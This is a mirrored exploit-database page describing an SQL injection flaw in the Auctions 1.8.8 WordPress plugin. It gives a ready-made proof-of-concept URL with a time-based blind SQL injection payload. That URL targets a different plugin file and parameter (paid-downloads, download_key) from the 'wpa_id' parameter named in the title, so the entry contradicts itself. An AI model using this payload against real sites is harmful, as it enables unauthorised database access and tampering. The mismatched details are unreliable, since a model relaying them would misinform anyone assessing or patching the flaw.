WordPress Plugin Auctions 1.8.8 – ‘wpa_id’ SQL Injection

Exploit Database
84 阅读

作者： sherl0ck_

日期： 2011-09-14
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/36135/

source: https://www.securityfocus.com/bid/49625/info

Auctions plug-in for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Owen Cutajar Auctions versions 1.8.8 and prior are vulnerable. 

http://www.example.com/wp-content/plugins/paid-downloads/download.php?download_key=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20

last Exploits
WordPress Plugin Auctions 1.8.8 – ‘wpa_id’ SQL Injection的更多信息

Inout CareerLamp 1.0 Script – Improper Access Restrictions：
Codiad 2.8.4 – Remote Code Execution (Authenticated) (4)：
Joomla! Component com_route – SQL Injection：
WP AutoComplete 1.0.4 – Unauthenticated SQLi：
Perch v3.2 – Persistent Cross Site Scripting (XSS)：
Apache2Triad 1.5.4 – Multiple Vulnerabilities：
Apple iOS 7.0.2 – Sim Lock Screen Display Bypass：
HomeAutomation 3.3.2 – Authentication Bypass：